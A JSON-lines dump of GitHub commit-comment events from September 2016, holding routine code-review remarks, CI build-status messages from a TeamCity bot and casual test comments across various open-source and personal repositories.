{"id":"4526419020","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925406,"position":34,"line":77,"path":"README.adoc","commit_id":"96ef2c8f4da5cb2d7cfe86debd8b71771f875a57","created_at":"2016-09-07T09:20:58Z","updated_at":"2016-09-07T09:20:58Z","body":"Testing. The embedded link to the style guide in the last comment did not show up in the activity feed for gradle/build-tool-web#92. Let's see if this one does."}},"created_at":"2016-09-07T09:20:58Z"}
{"id":"4526427214","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925422,"position":34,"line":77,"path":"README.adoc","commit_id":"96ef2c8f4da5cb2d7cfe86debd8b71771f875a57","created_at":"2016-09-07T09:22:34Z","updated_at":"2016-09-07T09:22:34Z","body":"Interesting. The second comment _did_ show up in the activity feed, meaning that issue references in comments must be \"simple\" links, not ones created through markdown syntax."}},"created_at":"2016-09-07T09:22:34Z"}
{"id":"4526428142","type":"CommitCommentEvent","actor":{"login":"Emilien24"},"repo":{"name":"Emilien24/test"},"payload":{"comment":{"id":18925426,"position":null,"line":null,"path":null,"commit_id":"b09de01b33c3134bf503bee7715f4babe5066ec7","created_at":"2016-09-07T09:22:45Z","updated_at":"2016-09-07T09:22:45Z","body":"super code, tu est un très bon développeur"}},"created_at":"2016-09-07T09:22:45Z"}
{"id":"4526428312","type":"CommitCommentEvent","actor":{"login":"PatrickRorth"},"repo":{"name":"PatrickRorth/Twitch.TV"},"payload":{"comment":{"id":18925427,"position":null,"line":null,"path":null,"commit_id":"945915206f329b9646314afa1956e9940365338b","created_at":"2016-09-07T09:22:46Z","updated_at":"2016-09-07T09:22:46Z","body":"Great! Have this been tested? :)"}},"created_at":"2016-09-07T09:22:46Z"}
{"id":"4526429611","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"mantesat/geoserver"},"payload":{"comment":{"id":18925434,"position":117,"line":1064,"path":"src/wms/src/main/java/org/geoserver/wms/map/RenderedImageMapOutputFormat.java","commit_id":"f53cce3cb91bddb76b5e3df1d7dd16309aac57e7","created_at":"2016-09-07T09:23:01Z","updated_at":"2016-09-07T09:23:01Z","body":"Yes, good, that's how you check if the param is supported or not"}},"created_at":"2016-09-07T09:23:01Z"}
{"id":"4526431464","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925439,"position":301,"line":301,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T09:23:24Z","updated_at":"2016-09-07T09:23:24Z","body":"```js\r\ndialog = this.state.show ?\r\n  <div><ModalDialog></div> :\r\n  <div></div>\r\n```\r\nแนทชอบ ternary style แต่อันนี้เป็น style มากกว่า"}},"created_at":"2016-09-07T09:23:24Z"}
{"id":"4526433830","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925449,"position":289,"line":289,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T09:23:50Z","updated_at":"2016-09-07T09:23:50Z","body":"เอ open dialog ใช้เมื่อไหร่หรอครับ?"}},"created_at":"2016-09-07T09:23:50Z"}
{"id":"4526437389","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925454,"position":null,"line":null,"path":null,"commit_id":"69b80da1531da42fafae21492bee8b994b260b1f","created_at":"2016-09-07T09:24:29Z","updated_at":"2016-09-07T09:24:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 945](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12820&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T09:24:29Z"}
{"id":"4526437892","type":"CommitCommentEvent","actor":{"login":"originerd"},"repo":{"name":"huiseoul/huiseoul.github.io"},"payload":{"comment":{"id":18925456,"position":null,"line":null,"path":null,"commit_id":"717c5ac1161771db18fe9fe2ffa1a112604ee0d7","created_at":"2016-09-07T09:24:34Z","updated_at":"2016-09-07T09:24:34Z","body":"이상한 사람들`...` 에서는 세 개네요. :smile:"}},"created_at":"2016-09-07T09:24:34Z"}
{"id":"4526438359","type":"CommitCommentEvent","actor":{"login":"laszlo-milu"},"repo":{"name":"CodecoolBP20161/python-school-system-with-orm-gear"},"payload":{"comment":{"id":18925459,"position":null,"line":null,"path":null,"commit_id":"ceb57a93c2ecb5d0c1cfe4c758ce04f1a9c66f89","created_at":"2016-09-07T09:24:40Z","updated_at":"2016-09-07T09:24:40Z","body":"I've got no idea how this conflict got here, because I solved it manually before pushing this commit, it must be a bug. Should you need to use this commit, keep the HEAD part and delete the rest."}},"created_at":"2016-09-07T09:24:40Z"}
{"id":"4526442981","type":"CommitCommentEvent","actor":{"login":"stucki"},"repo":{"name":"bq-dev/android_kernel_bq_common"},"payload":{"comment":{"id":18925468,"position":34,"line":159,"path":"drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c","commit_id":"d08a2765caea4c97587a5bacf1be760bdddf7018","created_at":"2016-09-07T09:25:30Z","updated_at":"2016-09-07T09:25:30Z","body":"This breaks the build for piccolo (macro_code is not defined)."}},"created_at":"2016-09-07T09:25:30Z"}
{"id":"4526443570","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925471,"position":null,"line":null,"path":null,"commit_id":"f272736f86e31b41a458ee05844c123ddd3b67ef","created_at":"2016-09-07T09:25:36Z","updated_at":"2016-09-07T09:25:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 944](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12818&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:07:47"}},"created_at":"2016-09-07T09:25:36Z"}
{"id":"4526445897","type":"CommitCommentEvent","actor":{"login":"stucki"},"repo":{"name":"bq-dev/android_kernel_bq_common"},"payload":{"comment":{"id":18925475,"position":57,"line":180,"path":"drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c","commit_id":"d08a2765caea4c97587a5bacf1be760bdddf7018","created_at":"2016-09-07T09:26:03Z","updated_at":"2016-09-07T09:26:03Z","body":"Does change apply to both vegetalte and piccolo?"}},"created_at":"2016-09-07T09:26:03Z"}
{"id":"4526448641","type":"CommitCommentEvent","actor":{"login":"stucki"},"repo":{"name":"bq-dev/android_kernel_bq_common"},"payload":{"comment":{"id":18925483,"position":null,"line":null,"path":null,"commit_id":"d08a2765caea4c97587a5bacf1be760bdddf7018","created_at":"2016-09-07T09:26:32Z","updated_at":"2016-09-07T09:26:32Z","body":"See my inline comments. This currently breaks the piccolo build."}},"created_at":"2016-09-07T09:26:32Z"}
{"id":"4526449163","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":18925485,"position":3,"line":5,"path":"README.txt","commit_id":"636e41a77158580186cec6668db66dec0436b858","created_at":"2016-09-07T09:26:38Z","updated_at":"2016-09-07T09:26:38Z","body":"@SkyFire , yep, we are using this for 18019 with patched exe file:) all good, thanks anyway"}},"created_at":"2016-09-07T09:26:38Z"}
{"id":"4526450236","type":"CommitCommentEvent","actor":{"login":"JKE-be"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18925487,"position":null,"line":null,"path":null,"commit_id":"41b455b40be900c28d267950aaf7f619c86fca9b","created_at":"2016-09-07T09:26:50Z","updated_at":"2016-09-07T09:26:50Z","body":"Please check side effect on website_crm_score module... "}},"created_at":"2016-09-07T09:26:50Z"}
{"id":"4526452772","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18925490,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T09:27:22Z","updated_at":"2016-09-07T09:27:22Z","body":"You have to use the git (master) version. The PPA is unfortunately outdated"}},"created_at":"2016-09-07T09:27:22Z"}
{"id":"4526452946","type":"CommitCommentEvent","actor":{"login":"stucki"},"repo":{"name":"bq-dev/android_kernel_bq_common"},"payload":{"comment":{"id":18925491,"position":25,"line":98,"path":"drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c","commit_id":"d08a2765caea4c97587a5bacf1be760bdddf7018","created_at":"2016-09-07T09:27:23Z","updated_at":"2016-09-07T09:27:23Z","body":"Remove the leading space."}},"created_at":"2016-09-07T09:27:23Z"}
{"id":"4526453311","type":"CommitCommentEvent","actor":{"login":"Emilien24"},"repo":{"name":"Emilien24/test"},"payload":{"comment":{"id":18925492,"position":null,"line":null,"path":null,"commit_id":"b09de01b33c3134bf503bee7715f4babe5066ec7","created_at":"2016-09-07T09:27:27Z","updated_at":"2016-09-07T09:27:27Z","body":"Tu devré fair atention ah ton ortografe"}},"created_at":"2016-09-07T09:27:27Z"}
{"id":"4526454024","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925494,"position":273,"line":273,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T09:27:35Z","updated_at":"2016-09-07T09:27:35Z","body":"กลุ่มนี้แทนที่จะใช้ onChange/onCheck สามารถกำหนด ref ให้กับ input แล้ว check เมื่อ update ง่ายกว่า\r\n```js\r\nupdate() {\r\n  validate(this.address);\r\n}\r\n\r\nrender() {\r\n  return (<fieldset>\r\n    <input ref={c => this.address = c} value={item.address} />\r\n    <button onClick={this.update}>add</button>\r\n  </fieldset>);\r\n}\r\n\r\n``"}},"created_at":"2016-09-07T09:27:35Z"}
{"id":"4526454357","type":"CommitCommentEvent","actor":{"login":"CoooRex"},"repo":{"name":"CoooRex/vladstariy1"},"payload":{"comment":{"id":18925498,"position":null,"line":null,"path":null,"commit_id":"3fd31764ac384fe5b8ec1956d44039621ec9f42e","created_at":"2016-09-07T09:27:40Z","updated_at":"2016-09-07T09:27:40Z","body":"vlad"}},"created_at":"2016-09-07T09:27:40Z"}
{"id":"4526455830","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18925502,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T09:27:57Z","updated_at":"2016-09-07T09:27:57Z","body":"I did paste the whole git repo version right into usr share icons."}},"created_at":"2016-09-07T09:27:57Z"}
{"id":"4526457471","type":"CommitCommentEvent","actor":{"login":"xiaoxiaosulp"},"repo":{"name":"xiaoxiaosulp/-"},"payload":{"comment":{"id":18925509,"position":null,"line":null,"path":null,"commit_id":"775de3ee053188fd2ceb2c0516550563ad3d1b49","created_at":"2016-09-07T09:28:17Z","updated_at":"2016-09-07T09:28:17Z","body":"http://www.fayifa.com/bangongshebei/25166904.html"}},"created_at":"2016-09-07T09:28:17Z"}
{"id":"4526459993","type":"CommitCommentEvent","actor":{"login":"vszakats"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18925513,"position":null,"line":null,"path":null,"commit_id":"8fa20da8e1a2f38440610221576ff027eb0c7e5e","created_at":"2016-09-07T09:28:47Z","updated_at":"2016-09-07T09:28:47Z","body":"Thank you! I intend to keep doing PRs for any future changes."}},"created_at":"2016-09-07T09:28:47Z"}
{"id":"4526460194","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925514,"position":null,"line":null,"path":null,"commit_id":"63c4c0469a30c9429aabe5edd32e107d6c85456e","created_at":"2016-09-07T09:28:49Z","updated_at":"2016-09-07T09:28:49Z","body":"> Something for the writing conventions guide.\r\n\r\nRight, that's why I mentioned gradle/build-tool-web#92 in this and other commit comments—so as to create an ongoing list of things we want to cover in the style guide. Take a look at the activity stream in that issue and you'll see what I mean.\r\n\r\n> I favour double quotes in code except for map keys/named arguments.\r\n\r\nOk. Do you have a specific rationale for that? I don't have strong opinions here; I just want to (a) be consistent and (b) avoid looking ignorant in the Groovy community. I'm not sure how much people care about this topic, really.\r\n\r\n> The above were double quotes because of copy & paste from user manual.\r\n\r\nYeah, I actually noticed that it's that way in the user manual when I was reviewing this. No worries.\r\n\r\nIn any case, it sounds like we should leave this snippet as-is, i.e. with single quotes. Yeah?"}},"created_at":"2016-09-07T09:28:49Z"}
{"id":"4526460529","type":"CommitCommentEvent","actor":{"login":"llun"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18925515,"position":222,"line":222,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T09:28:53Z","updated_at":"2016-09-07T09:28:53Z","body":"ตรงนี้ใช้ `this.props.onModify` ตรงๆ ก็ได้ป่าวครับ แล้วเอา `onModify` อออก"}},"created_at":"2016-09-07T09:28:53Z"}
{"id":"4526461622","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18925518,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T09:29:06Z","updated_at":"2016-09-07T09:29:06Z","body":"oO? Try `gtk-update-icon-cache -f /usr/share/icons/Numix`"}},"created_at":"2016-09-07T09:29:06Z"}
{"id":"4526461949","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925519,"position":null,"line":null,"path":null,"commit_id":"f272736f86e31b41a458ee05844c123ddd3b67ef","created_at":"2016-09-07T09:29:10Z","updated_at":"2016-09-07T09:29:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 946](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12823&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T09:29:10Z"}
{"id":"4526465672","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925528,"position":null,"line":null,"path":null,"commit_id":"a091574e2bb2f7c3c4bfe71e74480164ccb4f25f","created_at":"2016-09-07T09:29:50Z","updated_at":"2016-09-07T09:29:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 947](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12824&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T09:29:50Z"}
{"id":"4526468252","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18925532,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T09:30:20Z","updated_at":"2016-09-07T09:30:20Z","body":"The problem persists. Hm."}},"created_at":"2016-09-07T09:30:20Z"}
{"id":"4526474289","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18925542,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T09:31:28Z","updated_at":"2016-09-07T09:31:28Z","body":"test\r\n123\r\n45\r\n6hfh"}},"created_at":"2016-09-07T09:31:28Z"}
{"id":"4526475132","type":"CommitCommentEvent","actor":{"login":"GennadiyK"},"repo":{"name":"GennadiyK/bookingYourTeacher"},"payload":{"comment":{"id":18925545,"position":4,"line":34,"path":"index.html","commit_id":"e5f84e5ebccce6954c7e3248f1aeae439c57d128","created_at":"2016-09-07T09:31:39Z","updated_at":"2016-09-07T09:31:39Z","body":"button-bl-settings and button-bl-logout should have anothe class: <button class=\"btn btn-settings\"></button> \r\n<button class=\"btn btn-logout\"></button> "}},"created_at":"2016-09-07T09:31:39Z"}
{"id":"4526475784","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18925547,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T09:31:45Z","updated_at":"2016-09-07T09:31:45Z","body":"ter\r\ndsfsg"}},"created_at":"2016-09-07T09:31:45Z"}
{"id":"4526476246","type":"CommitCommentEvent","actor":{"login":"wking"},"repo":{"name":"opencontainers/image-spec"},"payload":{"comment":{"id":18925548,"position":73,"line":75,"path":"image/config.go","commit_id":"f2dc0e2d92eb0b39adff14601d84606d894bed16","created_at":"2016-09-07T09:31:50Z","updated_at":"2016-09-07T09:31:50Z","body":"On Wed, Sep 07, 2016 at 12:39:12AM -0700, Antonio Murdaca wrote:\n> This whole `runtimeSpec` is ugly and should/could be replaced by\n> using the library in `ocitools` probably - it's so easy to get\n> outdated and it's easy to forget something…\n\nI'm fine slotting in ocitools generate if folks would rather do that\nnow, but my personal impression (especially with opencontainers/tob#18\non the horizon) is that using runtime-spec directly is more stable\nthan using ocitools and that we don't really need any of the\ngenerating convenience that ocitools currently adds.\n\nAnd this whole “image-spec even needing to generate config.json” is\nugly, and should be replaced by stand-alone tooling to localize a\nreceived config [1] ;).\n\n[1]: https://github.com/opencontainers/image-spec/issues/87#issuecomment-221695266\n"}},"created_at":"2016-09-07T09:31:50Z"}
{"id":"4526479290","type":"CommitCommentEvent","actor":{"login":"samsalisbury"},"repo":{"name":"nyarly/sous"},"payload":{"comment":{"id":18925555,"position":74,"line":74,"path":"server/router.go","commit_id":"45b4446bfe21e550b1346f087b754f7ba07e56dd","created_at":"2016-09-07T09:32:24Z","updated_at":"2016-09-07T09:32:24Z","body":"Add is variadic, so you could do `g.Add(w, r, p)` if preferred."}},"created_at":"2016-09-07T09:32:24Z"}
{"id":"4526481442","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925558,"position":null,"line":null,"path":null,"commit_id":"a6e357ce9fbf29353c3938231d67cbd19243d7be","created_at":"2016-09-07T09:32:48Z","updated_at":"2016-09-07T09:32:48Z","body":"Certainly worth discussing in more detail when we work on gradle/build-tool-web#105 . I think I'd err on the side of mentioning composite builds anywhere we think it's a good idea to mention multi-project builds, because we want folks to know about their options here, and that they need not necessarily consolidate things into a multi-project (and therefore monorepo) build.\r\n\r\nBut again, I think we can table this until we work on 105. "}},"created_at":"2016-09-07T09:32:48Z"}
{"id":"4526481781","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925559,"position":null,"line":null,"path":null,"commit_id":"69b80da1531da42fafae21492bee8b994b260b1f","created_at":"2016-09-07T09:32:52Z","updated_at":"2016-09-07T09:32:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 945](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12820&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:23"}},"created_at":"2016-09-07T09:32:52Z"}
{"id":"4526482290","type":"CommitCommentEvent","actor":{"login":"DimOOOn91"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18925563,"position":34,"line":34,"path":"src/module03/homework/task3/SpecialStudent.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-07T09:32:58Z","updated_at":"2016-09-07T09:32:58Z","body":"добавил email"}},"created_at":"2016-09-07T09:32:58Z"}
{"id":"4526482489","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18925565,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T09:33:01Z","updated_at":"2016-09-07T09:33:01Z","body":"Something is wrong. The icons from your screenshot do not exist in the theme anymore."}},"created_at":"2016-09-07T09:33:01Z"}
{"id":"4526483421","type":"CommitCommentEvent","actor":{"login":"i2801"},"repo":{"name":"velopert/react-codelab-fundamentals"},"payload":{"comment":{"id":18925566,"position":null,"line":null,"path":null,"commit_id":"b8d2b5cd2cae483d35c0121b2481e5495cc5e29a","created_at":"2016-09-07T09:33:13Z","updated_at":"2016-09-07T09:33:13Z","body":"오호... 감사합니다~"}},"created_at":"2016-09-07T09:33:13Z"}
{"id":"4526485874","type":"CommitCommentEvent","actor":{"login":"samsalisbury"},"repo":{"name":"nyarly/sous"},"payload":{"comment":{"id":18925570,"position":18,"line":18,"path":"server/handle_gdm.go","commit_id":"45b4446bfe21e550b1346f087b754f7ba07e56dd","created_at":"2016-09-07T09:33:41Z","updated_at":"2016-09-07T09:33:41Z","body":"😀"}},"created_at":"2016-09-07T09:33:41Z"}
{"id":"4526486138","type":"CommitCommentEvent","actor":{"login":"intgr"},"repo":{"name":"2ndQuadrant/mysqlcompat"},"payload":{"comment":{"id":18925572,"position":2,"line":2,"path":"sql/mysqlcompat--0.0.2--0.0.3.sql","commit_id":"d046e393a90ddb8a5c79d281ed306f1080c58406","created_at":"2016-09-07T09:33:45Z","updated_at":"2016-09-07T09:33:45Z","body":"This is wrong. You need to copy the new functions to this upgrade script too. Otherwise people upgrading from 0.0.2 will be missing the functions with \"timestamp without time zone\"\r\n"}},"created_at":"2016-09-07T09:33:45Z"}
{"id":"4526486542","type":"CommitCommentEvent","actor":{"login":"Techwolf12"},"repo":{"name":"swiperproxy/swiperproxy"},"payload":{"comment":{"id":18925573,"position":null,"line":null,"path":null,"commit_id":"497afc60263aa8455bb82bee4683bb78c736795a","created_at":"2016-09-07T09:33:48Z","updated_at":"2016-09-07T09:33:48Z","body":"👍 :D"}},"created_at":"2016-09-07T09:33:48Z"}
{"id":"4526487608","type":"CommitCommentEvent","actor":{"login":"GennadiyK"},"repo":{"name":"GennadiyK/bookingYourTeacher"},"payload":{"comment":{"id":18925576,"position":4,"line":34,"path":"index.html","commit_id":"e5f84e5ebccce6954c7e3248f1aeae439c57d128","created_at":"2016-09-07T09:34:02Z","updated_at":"2016-09-07T09:34:02Z","body":"button-bl - change this class on aside-footer"}},"created_at":"2016-09-07T09:34:02Z"}
{"id":"4526489789","type":"CommitCommentEvent","actor":{"login":"runcom"},"repo":{"name":"opencontainers/image-spec"},"payload":{"comment":{"id":18925578,"position":73,"line":75,"path":"image/config.go","commit_id":"f2dc0e2d92eb0b39adff14601d84606d894bed16","created_at":"2016-09-07T09:34:28Z","updated_at":"2016-09-07T09:34:28Z","body":"> nd this whole “image-spec even needing to generate config.json” is\r\n> ugly, and should be replaced by stand-alone tooling to localize a\r\n> received config [1] ;).\r\n\r\nthat's my dream as well :)"}},"created_at":"2016-09-07T09:34:28Z"}
{"id":"4526493362","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925582,"position":null,"line":null,"path":null,"commit_id":"f272736f86e31b41a458ee05844c123ddd3b67ef","created_at":"2016-09-07T09:35:11Z","updated_at":"2016-09-07T09:35:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 946](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12823&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Tests failed: 1 (1 new), passed: 61, ignored: 2) Build time: 00:06:01\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T09:35:11Z"}
{"id":"4526494330","type":"CommitCommentEvent","actor":{"login":"Elakyaram"},"repo":{"name":"Elakyaram/json"},"payload":{"comment":{"id":18925584,"position":null,"line":null,"path":null,"commit_id":"ef80a3b19ad57ff0782eb02f23da4e6b387f3cff","created_at":"2016-09-07T09:35:21Z","updated_at":"2016-09-07T09:35:21Z","body":"data.txt"}},"created_at":"2016-09-07T09:35:21Z"}
{"id":"4526495374","type":"CommitCommentEvent","actor":{"login":"stardiviner"},"repo":{"name":"abo-abo/org-download"},"payload":{"comment":{"id":18925587,"position":null,"line":null,"path":null,"commit_id":"ec2dc69b7a49054bc0d34c6533cdcadba708db67","created_at":"2016-09-07T09:35:34Z","updated_at":"2016-09-07T09:35:34Z","body":"This caused input URL failed. Like in `ivy`, it will treat `/` in URL as `root path`.\r\nIf user want this file completing feature, I think should use a better solution."}},"created_at":"2016-09-07T09:35:34Z"}
{"id":"4526495515","type":"CommitCommentEvent","actor":{"login":"Elakyaram"},"repo":{"name":"Elakyaram/json"},"payload":{"comment":{"id":18925588,"position":null,"line":null,"path":null,"commit_id":"ef80a3b19ad57ff0782eb02f23da4e6b387f3cff","created_at":"2016-09-07T09:35:36Z","updated_at":"2016-09-07T09:35:36Z","body":"git"}},"created_at":"2016-09-07T09:35:36Z"}
{"id":"4526500564","type":"CommitCommentEvent","actor":{"login":"DimOOOn91"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18925593,"position":52,"line":52,"path":"src/module03/homework/task3/Student.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-07T09:36:35Z","updated_at":"2016-09-07T09:36:35Z","body":"все конструкторы перенесены"}},"created_at":"2016-09-07T09:36:35Z"}
{"id":"4526501654","type":"CommitCommentEvent","actor":{"login":"karasevb"},"repo":{"name":"karasevb/master"},"payload":{"comment":{"id":18925594,"position":4,"line":126,"path":"include/pmix_common.h","commit_id":"8687b51770d483d6d22231c16aad0c551fb7f343","created_at":"2016-09-07T09:36:48Z","updated_at":"2016-09-07T09:36:48Z","body":"char*"}},"created_at":"2016-09-07T09:36:48Z"}
{"id":"4526504861","type":"CommitCommentEvent","actor":{"login":"millin"},"repo":{"name":"groveco/django-sql-explorer"},"payload":{"comment":{"id":18925601,"position":null,"line":null,"path":null,"commit_id":"77e2778d2b76b2d5f90b6585041437ae5e4a9dbe","created_at":"2016-09-07T09:37:24Z","updated_at":"2016-09-07T09:37:24Z","body":"What problem with Django 1.10?"}},"created_at":"2016-09-07T09:37:24Z"}
{"id":"4526510335","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925611,"position":null,"line":null,"path":null,"commit_id":"a091574e2bb2f7c3c4bfe71e74480164ccb4f25f","created_at":"2016-09-07T09:38:31Z","updated_at":"2016-09-07T09:38:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 947](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12824&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:40"}},"created_at":"2016-09-07T09:38:31Z"}
{"id":"4526510992","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18925615,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T09:38:39Z","updated_at":"2016-09-07T09:38:39Z","body":"sadas"}},"created_at":"2016-09-07T09:38:39Z"}
{"id":"4526513790","type":"CommitCommentEvent","actor":{"login":"karasevb"},"repo":{"name":"karasevb/master"},"payload":{"comment":{"id":18925622,"position":12,"line":42,"path":"src/dstore/pmix_esh.c","commit_id":"8687b51770d483d6d22231c16aad0c551fb7f343","created_at":"2016-09-07T09:39:11Z","updated_at":"2016-09-07T09:39:11Z","body":"session_tbl_t"}},"created_at":"2016-09-07T09:39:11Z"}
{"id":"4526515401","type":"CommitCommentEvent","actor":{"login":"ielicyan"},"repo":{"name":"Bilibili/ijkplayer"},"payload":{"comment":{"id":18925626,"position":null,"line":null,"path":null,"commit_id":"48a342dbe2025e1523e2ab5a9b12b82dbf0f4fca","created_at":"2016-09-07T09:39:29Z","updated_at":"2016-09-07T09:39:29Z","body":"      SDL_WaitThread(opaque->enqueue_thread, NULL);\r\n      if (opaque->acodec) {\r\n          SDL_VoutAndroid_invalidateAllBuffers(opaque->weak_vout);\r\n          SDL_LockMutex(opaque->acodec_mutex);\r\n          SDL_AMediaCodec_stop(opaque->acodec);\r\n          SDL_UnlockMutex(opaque->acodec_mutex);\r\n      }\r\n      SDL_AMediaCodec_decreaseReferenceP(&opaque->acodec);\r\n      ALOGI(\"MediaCodec: %s: exit: %d\", __func__, ret);\r\n      return ret;"}},"created_at":"2016-09-07T09:39:29Z"}
{"id":"4526515624","type":"CommitCommentEvent","actor":{"login":"Vipeax"},"repo":{"name":"PatrickRorth/Twitch.TV"},"payload":{"comment":{"id":18925628,"position":null,"line":null,"path":null,"commit_id":"945915206f329b9646314afa1956e9940365338b","created_at":"2016-09-07T09:39:31Z","updated_at":"2016-09-07T09:39:31Z","body":"It works on my 55E6V as well as the emulator and a normal browser (IE/Chrome/FireFox).  "}},"created_at":"2016-09-07T09:39:31Z"}
